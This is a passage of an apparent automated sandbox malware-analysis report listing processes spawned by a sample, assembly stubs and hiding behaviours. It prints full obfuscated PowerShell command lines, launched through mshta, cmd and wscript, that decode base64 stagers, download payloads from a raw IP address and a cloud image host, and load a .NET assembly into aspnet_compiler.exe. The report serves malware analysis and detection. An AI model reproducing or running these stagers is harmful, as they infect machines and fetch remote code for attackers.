kVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenistaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_2_067E156F push es; iretd 0_2_067E1570
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_051142D2 push ebx; ret 3_2_051142DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04A93338 pushad ; retf 8_2_04A93341
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00407041 push cs; iretd 11_2_00407042
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041705E push edi; iretd 11_2_00417060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004030F0 push eax; ret 11_2_004030F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041C8FC push cs; iretd 11_2_0041C8C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401949 push 63DCA26Ah; ret 11_2_0040194E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040214B push edx; retf 11_2_0040214E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402101 push ebp; iretd 11_2_0040210D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040210E push eax; retf 11_2_0040214A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004021A4 push eax; retf 11_2_0040214A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041125B pushfd ; ret 11_2_0041125E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004242E3 push esp; ret 11_2_00424330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00417AFB push eax; ret 11_2_00417AFD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401AB8 push edx; retf 11_2_00401AE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00417C0B push ebp; iretd 11_2_00417C0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041ECDC push ds; iretd 11_2_0041ECDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401DF5 push ebp; iretd 11_2_00401DB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401DA6 push ebp; iretd 11_2_00401DB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00416EAA push esp; retf 11_2_00416EAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401F0D push eax; retf 11_2_00401F19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401FEB push edx; retf 11_2_00401FEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00410FEE push ebp; iretd 11_2_00411000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00410FF3 push ebp; iretd 11_2_00411000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401FA4 push edx; ret 11_2_00401FAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00401FBA push 0000006Ah; iretd 11_2_00401FC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010509AD push ecx; mov dword ptr [esp], ecx11_2_010509B6
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C29E3D push edx; iretd 12_2_06C29E3E
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C29CDE push 0000007Fh; iretd 12_2_06C29CE6
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C364B0 push esp; ret 12_2_06C364FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
